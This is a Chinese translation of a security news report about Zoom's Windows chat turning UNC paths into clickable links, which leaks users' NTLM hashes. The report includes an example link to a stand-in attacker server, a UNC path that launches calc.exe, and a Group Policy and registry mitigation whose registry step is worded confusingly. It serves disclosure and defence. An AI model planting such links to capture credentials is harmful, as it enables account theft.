研究人员发现Zoom windows客户端的客户端聊天特征中存在UNC路径注入漏洞,攻击者利用该漏洞可以点击该链接的用户的Windows凭证。
当使用Zoom客户端时,会议参与者可以通过聊天接口发送文本消息来与其他参与者通信。
在发送聊天消息时,URL都会转为超链接,因此其他参会者点击链接后就会在默认浏览器中打开一个web页面。
安全研究人员 @_g0dmode 发现Zoom客户端会将聊天消息中的Windows网络UNC路径转为可点击的链接。
Zoom聊天UNC注入
从上面的聊天消息中可以看到,聊天消息中普通的URL和UNC路径\\evil.server.com\images\cat.jpg都会转为可点击的链接。
UNC路径转为可点击的链接后会带来什么不好的影响呢?如果用户点击UNC路径链接,Windows就会尝试使用SMB文件共享协议连接到远程站点来打开一个远程文件——cat.jpg。
默认情况下,Windows会发送用户的login用户名和NTLM password哈希值,通过免费的工具Hashcat就可以破解NTLM password哈希值对应的密码。
安全研究人员Matthew Hickey (@HackerFantastic)测试了Zoom客户端的UNC注入,发现确实可以获取NTLM password哈希值。BleepingComputer也在本地测试验证了该结果。
获取NTLM password哈希值
使用Hashcat这样的程序在我们日常使用的计算机上用哈希值破解密码只需要16秒钟。
hashcat
除了窃取Windows凭证后,Hickey告诉BleepingComputer称,UNC注入还可以在点击链接时启动本地计算机上的程序。比如,点击\\127.0.0.1\C$\windows\system32\calc.exe这样的UNC路径就可以启动计算机上安装的计算器。幸好,Windows会弹窗询问用户是否要执行程序。
点击UNC路径启动本地程序
为修复该漏洞,Zoom需要避免聊天系统将UNC路径转为可点击的超链接。Hickey称在twitter上公布漏洞后就通知了Zoom。BleepingComputer也连续了Zoom但尚未得到回复。
预防NTLM凭证发送给远程服务器
在Zoom发布补丁之前,有一个方法预防该漏洞,那就是通过组策略设置来预防UNC链接被点击后NTML凭证自动发送给远程服务器。该策略为'Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers'。
组策略编辑器器中的路径为:
Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers
如果策略被配置为Deny all,Windows就不会自动发送NTLM凭证到远程服务器。
Group Policy
因为该策略是在加入域的机器上配置的,因此在尝试访问共享内容时可能会引发一些问题。如果不再需要该策略,可以在Windows注册表中配置,将RestrictSendingNTLMTraffic注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 key 设置为2就可以:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0] "RestrictSendingNTLMTraffic"=dword:00000002
删除策略中的RestrictSendingNTLMTraffic也可以达到同样的目的。
本文翻译自:https://www.bleepingcomputer.com/news/security/zoom-client-leaks-windows-login-credentials-to-attackers/如若转载,请注明原文地址